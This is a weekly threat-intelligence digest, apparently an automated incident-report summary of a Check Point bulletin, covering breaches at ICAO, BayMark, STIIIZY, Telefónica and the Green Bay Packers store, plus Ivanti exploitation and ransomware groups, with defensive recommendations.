Full Report
For the latest discoveries in cyber research for the week of 13th January, please download our Threat Intelligence Bulletin. TOP ATTACKS AND BREACHES The International Civil Aviation Organization (ICAO), that is part of the UN, confirmed a compromise of its recruitment database that exposed 42,000 recruitment applications. The data contains records from April 2016 to […] The post 13th January – Threat Intelligence Report appeared first on Check Point Research.
Analysis Summary
# Incident Report: Summary of Security Incidents (Week of January 13th)
## Executive Summary
This summary details several high-profile security breaches occurring across various sectors, including breaches impacting a UN agency (ICAO), government entities (Argentina PSA, Slovakia UGKK), and numerous private organizations via ransomware and web application compromises. The incidents highlight significant risks associated with third-party dependencies, ransomware activity (Everest, RansomHub, FunkSec), and active exploitation of newly disclosed vulnerabilities.
## Incident Details
- **Discovery Date:** Ongoing (Report covers incidents reported around the week of January 13th, 2025)
- **Incident Date:** Variable, spanning from 2016 to late 2024 for some breaches.
- **Affected Organization:** International Civil Aviation Organization (ICAO), Argentina PSA, UGKK (Slovakia), Telefónica, STIIIZY, BayMark Health Services, Nodex (ISP), Green Bay Packers Online Store.
- **Sector:** Aviation/UN Agencies, Government/Law Enforcement, Land Registry, Telecommunications, E-commerce/Cannabis Vendor, Healthcare Services, Internet Service Provider, Sports Retail.
- **Geography:** Global (ICAO), Argentina, Slovakia, Spain, US.
## Timeline of Events
*(Note: Specific dates vary widely based on the source article. The timeline reflects the discovery/reporting period for these incidents.)*
### Initial Access
- **Varies (e.g., Sept-Oct 2024 for Green Bay Packers; Oct-Nov 2024 for STIIIZY)**
- **Vector:** Third-party service compromise (STIIIZY), Vulnerability exploitation (Argentina PSA via Banco Nación systems), Ransomware activity (BayMark, Telefónica, UGKK), Malicious code injection (Green Bay Packers checkout page).
- **Details:**
* **STIIIZY:** Compromise occurred via a 3rd party point-of-sale processing service.
* **Green Bay Packers:** Malicious code injected into the online store checkout page.
* **Argentina PSA:** Attackers exploited a vulnerability in Banco Nación's systems used to process PSA payroll.
* **UGKK:** Believed victim of an undisclosed ransomware group.
### Lateral Movement
- **Not explicitly detailed for all, but implied in complex ransomware/espionage cases:**
* **BayMark & RansomHub:** Implied multi-stage access to exfiltrate 1.5 TB of data.
* **China Espionage Groups:** Exploited Ivanti CVE-2025-0242, suggesting network exploration.
### Data Exfiltration/Impact
- **ICAO:** Exposure of 42,000 recruitment applications (names, emails, DOB, employment history from 2016–2024).
- **BayMark:** Exfiltration of 1.5 TB of data, including PII, SSNs, DOBs, and insurance information.
- **STIIIZY:** Extraction of personal data and IDs of 422,075 customers.
- **Telefónica:** Leak of 2.3 GB of documents, ticketing data, and internal files from the ticketing system.
- **Green Bay Packers:** Theft of payment card information from over 8,500 customers.
- **UGKK (Slovakia):** Loss of availability for the land ownership database due to ransomware.
- **Nodex (Russia):** Complete destruction of the ISP’s network, dropping global traffic to zero.
### Detection & Response
- **Mode of Discovery:** Data leaks on hacking forums (Telefónica), confirmation by organizations (ICAO), mandated patches for active vulnerabilities (Ivanti CVE-2025-0242).
- **Actions:** Mozilla released Firefox 134 to patch high-severity issues. SonicWall urged firmware updates for CVE-2024-53704. CISA mandated patching for federal agencies regarding the Ivanti vulnerability.
## Attack Methodology
- **Initial Access:** Third-party compromise, vulnerability exploitation (e.g., Banco Nación systems, Ivanti VPN), Ransomware infection, JavaScript/Malicious Code Injection (Magecart style).
- **Persistence:** Not explicitly detailed, but implied by data exfiltration occurring over extended periods (BayMark: Sept 24–Oct 14, 2024).
- **Privilege Escalation:** Not detailed, but likely necessary for large-scale exfiltration (BayMark).
- **Defense Evasion:** Banshee macOS stealer mimicked Apple’s XProtect antivirus engine. FunkSec utilizes AI-assisted malware development.
- **Credential Access:** Potential via stolen credentials or phishing linked to the Riya travel agency phishing campaign.
- **Discovery:** Unknown, except for threats like Banshee which perform reconnaissance to steal specific data types (browser credentials, wallets).
- **Lateral Movement:** Unspecified for most, but necessary to breach large internal databases (ICAO, BayMark).
- **Collection:** Targeted theft of HR/Recruitment data (ICAO), PII/SSNs/Insurance data (BayMark), and payment card data (Packers).
- **Exfiltration:** Direct data theft via ransomware groups (RansomHub, Everest) and manual data dumps (Telefónica).
- **Impact:** Operational shutdown (UGKK, Nodex), data theft/disclosure.
## Impact Assessment
- **Financial:** Unknown costs associated with remediation, though system destruction (Nodex) implies significant capital loss.
- **Data Breach:** High volume PII: ~42,000 recruitment profiles (ICAO); ~422k customer PII/IDs (STIIIZY); 1.5 TB PII/SSNs (BayMark); 8,500+ payment cards (Packers).
- **Operational:** Severe service disruption—UGKK land database availability impacted; Nodex network completely destroyed.
- **Reputational:** Negative press for major UN body (ICAO) and national security organizations (Argentina PSA).
## Indicators of Compromise
*(Note: Specific IOCs are not provided in the summary text, only threat actor/malware names linked to protection signatures.)*
- **Network indicators:** Unknown (Defanged).
- **File indicators:** Ransomware signatures noted: Ransomware.Win.RansomHub; Ransomware.Wins.RansomHub.ta.*; Ransomware.Wins.Funksec.A.
- **Behavioral indicators:** Active exploitation of Ivanti CVE-2025-0242 by Chinese espionage groups (UNC5221/SPAWN). Banshee macOS Stealer mimicking XProtect behavior.
## Response Actions
- **Containment:** Not explicitly detailed, but implied cessation of data handling by affected parties post-discovery.
- **Eradication:** Security patching by Mozilla, SonicWall, and MediaTek addressing high/critical vulnerabilities. CISA mandated emergency patching for Ivanti appliances.
- **Recovery:** Unknown for infrastructure destruction (Nodex) or database compromise (UGKK). Organizations like ICAO are dealing with historical data exposure.
## Lessons Learned
- Historical data retention presents ongoing risk (ICAO data from 2016 exposed).
- Third-party dependencies introduce significant risk, as evidenced by the STIIIZY breach via a POS processor.
- Rapid ransomware evolution, potentially leveraging AI (FunkSec), challenges traditional defensive postures.
- Newly disclosed, high-severity vulnerabilities (e.g., Ivanti CVE-2025-0242) are exploited immediately by sophisticated actors.
## Recommendations
- Review and aggressively patch *all* disclosed vulnerabilities, especially those actively exploited (e.g., Ivanti).
- Implement stringent security auditing and segmentation for all critical third-party service providers, particularly those handling financial or PII data (e.g., POS systems).
- Enhance endpoint detection for suspicious behavior, specifically targeting defense evasion techniques used by advanced malware (like Banshee masking as an AV).
- Review policies regarding long-term retention of highly sensitive PII/personnel data.